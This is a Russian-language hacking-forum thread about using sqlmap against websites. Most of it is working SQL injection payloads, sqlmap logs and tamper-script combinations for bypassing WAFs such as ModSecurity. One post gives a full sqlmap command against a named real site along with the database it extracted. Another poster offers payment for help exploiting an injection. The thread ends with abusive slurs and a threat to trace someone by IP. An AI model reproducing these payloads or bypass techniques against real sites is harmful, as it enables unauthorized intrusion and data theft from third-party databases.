Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Доброго вечера, ребята. Актуальный вопрос, может есть готовый тампер под - Imunify360 (CloudLinux) waf, либо может взять что-то из готового и переписать?
    Уж один сладкий вариант подвернулся))
    Всех с наступающим Новым 2022 Годом.
     
  2. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    266
    Likes Received:
    12
    Reputations:
    1
    Code:
    Parameter: JSON #1* ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
    ause (UPDATEXML)
        Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL
    ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}
    
        Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D
    ELIMITER_STOP]'),[RANDNUM1])
    ---
    [12:20:48] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 7.2.34
    back-end DBMS: MySQL >= 5.1
    [12:20:48] [INFO] fetching database names
    [12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C
    OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs
    S'='BbsS
    [12:20:49] [WARNING] the SQL query provided does not return any output
    [12:20:49] [INFO] falling back to current database
    [12:20:49] [INFO] fetching current database
    [12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT
    ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
    [12:20:49] [DEBUG] performed 1 query in 0.65 seconds
    [12:20:49] [CRITICAL] unable to retrieve the database names
     
  3. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребят помогите как запихнуть в sqlmap
    есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
    работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
    руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
     
  4. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода https://forum.antichat.com/threads/425295/
     
  5. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    what MYSQL version ?

    https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
     
  6. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  7. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Попробовал как у автора from {f information_schema.tables} блочит 403 выдает и все
    просто '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ работает версия выводится
    Пробовал в ручную как у автора тут
    Тоже тупо блок может это не модсекьюрите?хотя конечно очень похоже
     
  8. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    test versionedkeywords,between,unionalltounion tamper scripts together
     
  9. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    [13:53:45] [CRITICAL] all tested parameters do not appear to be injectable
    [13:53:45] [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times
    К сожалению tamper не помог
     
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    send me your target link via pm
     
  11. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    python3 sqlmap.py -u "https://mkeducationalsupplies.com.au/viewproduct.php?productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,space2comment,unionalltounion --fresh-queries

    available databases [1]:
    [*] mkeducat_books2019
     
    exe-world likes this.
  12. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    deleted
     
    #1152 eminlayer7788, 18 May 2022
    Last edited: 10 Oct 2022
  13. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    266
    Likes Received:
    12
    Reputations:
    1
    Помогите раскрутить скулю.Готов оплатить.
    мап выдает всю инфу кроме таблиц.При выводе таблиц ответ от сервера 404.
    Code:
    [19:10:09] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP
    back-end DBMS: MySQL >= 5.0
    [19:10:09] [INFO] fetching database names
    [19:10:09] [DEBUG] used SQL query returns 2 entries
    [19:10:09] [INFO] starting 2 threads
    [19:10:09] [INFO] resumed: 'information_schema'
    [19:10:09] [INFO] resumed: 'a7ewww1ff'
    [19:10:09] [DEBUG] performed 0 queries in 0.12 seconds
    [19:10:09] [INFO] fetching tables for databases: 'a7ewww1ff, informat
    ion_schema'
    [19:10:09] [PAYLOAD] 1' AND (SELECT 7181 FROM(SELECT COUNT(*),CONCAT(0x71787a6b7
    1,(SELECT HEX(IFNULL(CAST(COUNT(*) AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.TABL
    ES WHERE table_schema IN (0x61376531666638365f7070757067726164653234,0x696e666f7
    26d6174696f6e5f736368656d61)),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_S
    CHEMA.PLUGINS GROUP BY x)a)-- VZaA
    you provided a HTTP Cookie header value, while target URL provides its own cooki
    es within HTTP Set-Cookie header which intersect with yours. Do you want to merg
    e them in further requests? [Y/n] Y
    [19:10:09] [DEBUG] used the default behavior, running in batch mode
    [19:10:10] [DEBUG] declared web page charset 'utf-8'
    [19:10:10] [DEBUG] page not found (404)
    [19:10:10] [WARNING] the SQL query provided does not return any output
    [19:10:10] [PAYLOAD] 1' AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x71787a6b7
    1,(SELECT HEX(IFNULL(CAST(COUNT(*) AS NCHAR),0x20)) FROM mysql.innodb_table_stat
    s WHERE database_name IN (0x61376531666638365f7070757067726164653234,0x696e666f7
    26d6174696f6e5f736368656d61)),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_S
    CHEMA.PLUGINS GROUP BY x)a)-- zeaQ
    [19:10:10] [WARNING] the SQL query provided does not return any output
    [19:10:10] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    [19:10:10] [DEBUG] used the default behavior, running in batch mode
    No tables found
    [19:10:10] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 2 times
    [19:10:10] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
     kind of protection is involved (e.g. WAF)
    [19:10:10] [WARNING] your sqlmap version is outdated
     
  14. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    1. update your sqlmap
    2. count() your DB, may be it is empty row
    3. --no-cast, --hex, tamper scripts
    4. --ignore-code=404
    5. check it manually
     
  15. ilya1337

    ilya1337 New Member

    Joined:
    19 Mar 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Как правильно составить запрос в sqlmap чтобы отправить сообщение через smtp в ms server и можно ли это в других субд?
    ПРИМЕР: https://habr.com/ru/post/179819/
    Пробовал создать профиль --sql-query=EXECUTE msdb.dbo.sysmail_add_account_sp
    Но получаю 'NULL'
     
  16. wcryptocoin

    wcryptocoin New Member

    Joined:
    29 Sep 2023
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста какой тампер использовать
    --tamper=between,space2comment

    [INFO] testing MySQL
    [PAYLOAD] [email protected]'/**/RLIKE%09(SELECT%09(CASE%09WHEN%09(QUARTER(NULL%09XOR%09NULL%09)/**/IS%09NULL%09)/**/THEN%090x7465737440746573742e74657374/**/ELSE%090x28/**/END%09))/**/AND%09'ZlFN'/**/LIKE/**/'ZlFN
    [INFO] confirming MySQL
    [PAYLOAD] [email protected]'/**/RLIKE%09(SELECT%09(CASE%09WHEN%09(SESSION_USER()/**/LIKE%09USER())/**/THEN%090x7465737440746573742e74657374/**/ELSE%090x28/**/END%09))/**/AND%09'sSAo'/**/LIKE/**/'sSAo
    [DEBUG] got HTTP error code: 403 ('Forbidden')
    [email protected]'/**/RLIKE%09(SELECT%09(CASE%09WHEN%09(GEOGRAPHY_AREA(NULL%09)/**/IS%09NULL%09)/**/THEN%090x7465737440746573742e74657374/**/ELSE%090x28/**/END%09))/**/AND%09'bSFh'/**/LIKE/**/'bSFh
    [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [WARNING] the back-end DBMS is not MySQL
    [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

    Есть несколько таких сайтов и если хостинг находится на server*.web-hosting.com не могу вывести имя баз
     
  17. wcryptocoin

    wcryptocoin New Member

    Joined:
    29 Sep 2023
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Мертвый форум (
     
  18. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    абидна, больна такое читат. ну а вопрос твой, если что, аутистический) Хрен знает что у тебя там. Нормальные люди тестят руками ответы сервера, смотрят что не хочет сервер пропускать а потом принимают решение какой обход заюзать. Ну а ты высрал 10 строк в которых нифига не понятно и они несут просто ноль информации, ровно столько сколько грамм весит твой умище, кек. Иди трудись)
     
  19. wcryptocoin

    wcryptocoin New Member

    Joined:
    29 Sep 2023
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Слышь хуило, иди грамоте учись лучше хохляндия
     
  20. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Я тебя вычислю по ИП, смотри мне